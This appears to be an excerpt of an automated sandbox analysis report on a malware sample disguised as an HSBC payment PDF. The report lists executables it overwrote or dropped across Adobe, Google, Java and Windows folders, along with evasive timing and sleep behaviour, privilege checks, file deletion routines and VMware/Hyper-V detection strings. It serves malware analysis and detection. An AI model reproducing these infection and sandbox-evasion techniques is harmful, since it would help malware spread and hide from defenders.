              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-181667
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\SysWOW64\perfhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\Spectrum.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-183332
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeAPI coverage: 5.2 %
              Source: C:\Windows\SysWOW64\perfhost.exeAPI coverage: 1.7 %
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 3040Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Windows\System32\msdtc.exe TID: 7688Thread sleep count: 483 > 30Jump to behavior
              Source: C:\Windows\System32\msdtc.exe TID: 7688Thread sleep time: -48300s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\perfhost.exe TID: 7852Thread sleep count: 7782 > 30
              Source: C:\Windows\SysWOW64\perfhost.exe TID: 7852Thread sleep time: -77820000s >= -30000s
              Source: C:\Windows\SysWOW64\perfhost.exe TID: 7852Thread sleep count: 2216 > 30
              Source: C:\Windows\SysWOW64\perfhost.exe TID: 7852Thread sleep time: -22160000s >= -30000s
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598565Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597768Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597307Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597203Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596704Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596568Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596349Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596093Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595923Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595779Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595561Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594888Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593683Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593524Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593354Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593086Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592959Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592718Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592387Jump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
              Source: Spectrum.exe, 00000014.00000003.1493327773.00000000005E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00<
              Source: SensorDataService.exe, 00000012.00000003.1563717043.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device2jZ
              Source: Spectrum.exe, 00000014.00000003.1495882169.00000000005BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
              Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 00000014.00000003.1495410432.00000000005E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @;^2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
              Source: Spectrum.exe, 00000014.00000003.1493327773.00000000005E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: Spectrum.exe, 00000014.00000003.1493550327.00000000005D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverLMEM
              Source: SensorDataService.exe, 00000012.00000003.1461972151.000000000059A000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000012.00000003.1462082089.000000000059A000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000012.00000003.1461666228.000000000058B000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495882169.0000000000587000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1992416564.000000000087B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1354235632.0000000000874000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1408234894.000000000087B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1382519180.0000000000873000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1538390741.000000000087B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1432188181.000000000087B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1354422021.000000000087C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1501311933.000000000087B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1382647933.000000000087C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: SensorDataService.exe, 00000012.00000003.1563717043.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicen
              Source: SensorDataService.exe, 00000012.00000003.1461666228.000000000058B000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1493327773.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
              Source: snmptrap.exe, 00000013.00000002.2593089162.00000000004A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
              Source: Spectrum.exe, 00000014.00000003.1493327773.00000000005E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .inVMware Virtual disk SCSI Disk Devicet System ManagementR
              Source: Spectrum.exe, 00000014.00000003.1495882169.00000000005BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Device
              Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346748360.0000000000AC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: SensorDataService.exe, 00000012.00000003.1563717043.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `hZSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: RegSvcs.exe, 00000005.00000002.2621954804.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 00000016.00000002.2600146286.00000000005F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: SensorDataService.exe, 00000012.00000003.1461666228.000000000058B000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1493327773.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
              Source: SensorDataService.exe, 00000012.00000003.1563717043.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `QZSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: SensorDataService.exe, 00000012.00000002.1564642086.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZVMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
              Source: Spectrum.exe, 00000014.00000003.1495410432.00000000005E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @;^VMware Virtual USB Mouse
              Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
              Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
              Source: SensorDataService.exe, 00000012.00000003.1462152441.0000000000588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Z2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
              Source: Spectrum.exe, 00000014.00000003.1495683594.00000000005EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: B_SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 00000014.00000003.1495683594.00000000005EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
              Source: Spectrum.exe, 00000014.00000003.1495683594.00000000005EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
